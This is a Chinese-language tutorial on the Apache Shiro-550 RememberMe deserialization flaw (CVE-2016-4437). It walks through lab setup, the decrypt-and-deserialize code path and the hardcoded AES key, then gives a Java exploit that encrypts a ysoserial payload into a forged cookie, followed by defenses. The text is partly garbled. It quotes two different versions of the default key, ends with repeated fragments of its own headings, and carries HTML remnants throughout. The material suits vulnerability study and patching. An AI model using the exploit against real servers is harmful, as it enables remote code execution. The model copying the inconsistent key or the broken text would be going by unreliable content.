Apache Shiro 反序列化漏洞(CVE-2016-4437)深入分析与利用指南<\/h1>

1. 漏洞概述<\/h2>
漏洞编号<\/strong>: CVE-2016-4437
漏洞名称<\/strong>: Shiro-550反序列化漏洞
影响版本<\/strong>: Apache Shiro 1.2.4及之前版本
漏洞类型<\/strong>: 反序列化远程代码执行
CVSS评分<\/strong>: 9.8 (Critical)<\/p>

漏洞原理<\/h3>
Shiro框架的RememberMe功能存在反序列化漏洞，攻击者可以通过构造恶意的序列化对象，利用默认加密密钥进行加密后作为RememberMe字段发送，服务器在解密和反序列化过程中执行恶意代码。<\/p>
2. 漏洞环境搭建<\/h2>
2.1 环境准备<\/h3>

下载Shiro 1.2.4源码:<\/p>
https:\/\/github.com\/apache\/shiro\/tree\/shiro-root-1.2.4 <\/code><\/pre> <\/li> 修改pom.xml文件:<\/p> 将jstl依赖版本改为1.2<\/li> <\/ul> <\/li> 使用IDEA导入Maven项目<\/p> <\/li> <\/ol> 2.2 运行配置<\/h3> 设置运行配置为Tomcat本地服务器<\/li> JRE选择Java 8版本<\/li> 部署工件选择samples-web:war<\/code><\/li> 启动后访问http:\/\/localhost:8080\/samples_web_war\/login.jsp<\/code><\/li> <\/ol> 3. 漏洞分析<\/h2> 3.1 漏洞触发流程<\/h3> 用户登录时勾选"Remember Me"<\/li> 服务器返回包含rememberMe<\/code>字段的Cookie<\/li> 攻击者构造恶意序列化对象，使用默认密钥加密后替换rememberMe<\/code>值<\/li> 服务器接收后解密并反序列化，执行恶意代码<\/li> <\/ol> 3.2 关键代码分析<\/h3> 3.2.1 解密流程<\/h4> Shiro对RememberMe字段进行三层处理:<\/p> Base64解码<\/strong><\/p> byte<\/span>[]<\/span> decoded =<\/span> Base64.<\/span>decode<\/span>(<\/span>base64);<\/span> <\/span><\/span><\/code><\/pre><\/li> AES解密<\/strong><\/p> bytes =<\/span> decrypt(<\/span>bytes);<\/span> \/\/ 使用默认密钥解密 <\/span><\/span><\/span><\/code><\/pre><\/li> 反序列化<\/strong><\/p> return<\/span> deserialize(<\/span>bytes);<\/span> \/\/ 最终触发反序列化漏洞 <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 3.2.2 默认密钥问题<\/h4> 在AbstractRememberMeManager<\/code>类的构造方法中:<\/p> public<\/span> AbstractRememberMeManager<\/span>()<\/span> {<\/span> <\/span><\/span> this<\/span>.<\/span>serializer<\/span> =<\/span> new<\/span> DefaultSerializer<<\/span>PrincipalCollection>();<\/span> <\/span><\/span> this<\/span>.<\/span>cipherService<\/span> =<\/span> new<\/span> AesCipherService();<\/span> <\/span><\/span> setCipherKey(<\/span>DEFAULT_CIPHER_KEY_BYTES);<\/span> \/\/ 使用硬编码密钥 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>默认密钥定义:<\/p> private<\/span> static<\/span> final<\/span> byte<\/span>[]<\/span> DEFAULT_CIPHER_KEY_BYTES =<\/span> <\/span><\/span> Base64.<\/span>decode<\/span>(<\/span>"kPH+bIzk5D2deZiIxcaaaA=="<\/span>);<\/span> <\/span><\/span><\/code><\/pre>3.2.3 反序列化点<\/h4> 最终反序列化发生在DefaultSerializer<\/code>类的deserialize<\/code>方法中:<\/p> public<\/span> T deserialize<\/span>(<\/span>byte<\/span>[]<\/span> serialized)<\/span> throws<\/span> SerializationException {<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> ObjectInputStream ois =<\/span> new<\/span> ClassResolvingObjectInputStream(<\/span>bis);<\/span> <\/span><\/span> T deserialized =<\/span> (<\/span>T)<\/span> ois.<\/span>readObject<\/span>();<\/span> \/\/ 反序列化漏洞触发点 <\/span><\/span><\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>4. 漏洞利用<\/h2> 4.1 漏洞检测<\/h3> 访问登录页面并勾选"Remember Me"<\/li> 抓包观察响应中是否包含rememberMe<\/code>字段<\/li> 尝试使用默认密钥加密payload发送<\/li> <\/ol> 4.2 利用步骤<\/h3> 生成恶意序列化payload(使用ysoserial等工具)<\/li> 使用Shiro默认密钥加密payload<\/li> 将加密结果Base64编码后作为rememberMe<\/code>值发送<\/li> <\/ol> 4.3 利用代码示例<\/h3> import<\/span> org.apache.shiro.crypto.AesCipherService;<\/span> <\/span><\/span>import<\/span> org.apache.shiro.codec.CodecSupport;<\/span> <\/span><\/span>import<\/span> org.apache.shiro.util.ByteSource;<\/span> <\/span><\/span>import<\/span> org.apache.shiro.codec.Base64;<\/span> <\/span><\/span>import<\/span> java.nio.file.*;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> ShiroExploit<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 读取ysoserial生成的payload <\/span><\/span><\/span><\/span> byte<\/span>[]<\/span> payloads =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>".\/payload.bin"<\/span>));<\/span> <\/span><\/span> <\/span><\/span> \/\/ 使用Shiro默认密钥加密 <\/span><\/span><\/span><\/span> AesCipherService aes =<\/span> new<\/span> AesCipherService();<\/span> <\/span><\/span> byte<\/span>[]<\/span> key =<\/span> Base64.<\/span>decode<\/span>(<\/span>CodecSupport.<\/span>toBytes<\/span>(<\/span>"kPH+bIxk5D2deZiIxcaaaA=="<\/span>));<\/span> <\/span><\/span> ByteSource ciphertext =<\/span> aes.<\/span>encrypt<\/span>(<\/span>payloads,<\/span> key);<\/span> <\/span><\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>ciphertext.<\/span>toString<\/span>());<\/span> \/\/ 输出加密后的payload <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>5. 防御措施<\/h2> 升级Shiro版本<\/strong>: 升级到1.2.5及以上版本，使用随机生成的密钥<\/li> 自定义加密密钥<\/strong>: 在配置中设置自定义的cipherKey<\/code> securityManager.rememberMeManager.cipherKey<\/span> =<\/span> your_random_key_here<\/span> <\/span><\/span><\/code><\/pre><\/li> 禁用RememberMe功能<\/strong>: 如不需要，可完全禁用该功能<\/li> 反序列化防护<\/strong>: 使用反序列化过滤器或白名单机制<\/li> <\/ol> 6. 相关工具<\/h2> ysoserial<\/strong>: 生成Java反序列化payload<\/li> ShiroExploit<\/strong>: 自动化利用工具<\/li> BurpSuite插件<\/strong>: Shiro反序列化检测插件<\/li> <\/ol> 7. 参考链接<\/h2> Apache Shiro官方文档<\/li> CVE-2016-4437漏洞公告<\/li> Shiro源码分析文章<\/li> <\/ol> 本教学文档详细分析了Shiro反序列化漏洞的原理、利用方式和防御措施，关键点包括默认密钥问题、三层解密流程和最终反序列化触发点。通过理解这些核心概念，安全研究人员可以更好地检测和防御此类漏洞。<\/p>

Apache Shiro 反序列化漏洞(CVE-2016-4437)深入分析与利用指南<\/h1>

1. 漏洞概述<\/h2> 漏洞编号<\/strong>: CVE-2016-4437 漏洞名称<\/strong>: Shiro-550反序列化漏洞 影响版本<\/strong>: Apache Shiro 1.2.4及之前版本 漏洞类型<\/strong>: 反序列化远程代码执行 CVSS评分<\/strong>: 9.8 (Critical)<\/p>

2. 漏洞环境搭建<\/h2>

3. 漏洞分析<\/h2>

3.2 关键代码分析<\/h3>

4. 漏洞利用<\/h2>

1. 漏洞概述<\/h2>
漏洞编号<\/strong>: CVE-2016-4437
漏洞名称<\/strong>: Shiro-550反序列化漏洞
影响版本<\/strong>: Apache Shiro 1.2.4及之前版本
漏洞类型<\/strong>: 反序列化远程代码执行
CVSS评分<\/strong>: 9.8 (Critical)<\/p>